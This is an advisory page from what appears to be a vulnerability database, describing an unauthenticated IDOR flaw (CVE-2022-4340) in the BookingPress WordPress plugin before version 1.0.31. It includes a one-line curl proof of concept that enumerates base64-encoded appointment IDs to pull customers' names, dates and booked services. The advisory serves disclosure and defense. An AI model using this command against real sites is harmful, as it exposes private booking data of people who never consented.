Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitHussien MisbahWPEX-ID:8A7BD9F6-2789-474B-A237-01C643FDFBA7
HistoryDec 07, 2022 - 12:00 a.m.

BookingPress < 1.0.31 - Unauthenticated IDOR in appointment_id

2022-12-0700:00:00
Hussien Misbah
160
unauthenticated
idor
exploit
appointment_id
base64
host
service
datetime
customer

EPSS

0.001

Percentile

40.5%

JSON

The plugin suffers from an Insecure Direct Object Reference (IDOR) vulnerability in it’s thank you page, allowing any visitor to display information about any booking, including full name, date, time and service booked, by manipulating the appointment_id query parameter.

curl -s "http://host/thank-you/?appointment_id=$(echo 2 | base64 )" | grep  "(service|datetime|customer)" 

changing the number reveals the customer name tied to this appointment if there is no result then this appointment is not reversed yet.

Related

cve 1
prion 1
wpvulndb 1
nvd 1
cvelist 1
cve
cve
CVE-2022-4340
2023-01-02 22:15:17
prion
prion
Information disclosure
2023-01-02 22:15:00
wpvulndb
wpvulndb
BookingPress < 1.0.31 - Unauthenticated IDOR in appointment_id
2022-12-07 00:00:00
nvd
nvd
CVE-2022-4340
2023-01-02 22:15:17
cvelist
cvelist
CVE-2022-4340 BookingPress < 1.0.31 - Unauthenticated IDOR in appointment_id
2023-01-02 21:49:16

EPSS

0.001

Percentile

40.5%

JSON
Related for WPEX-ID:8A7BD9F6-2789-474B-A237-01C643FDFBA7
cve1prion1wpvulndb1nvd1cvelist1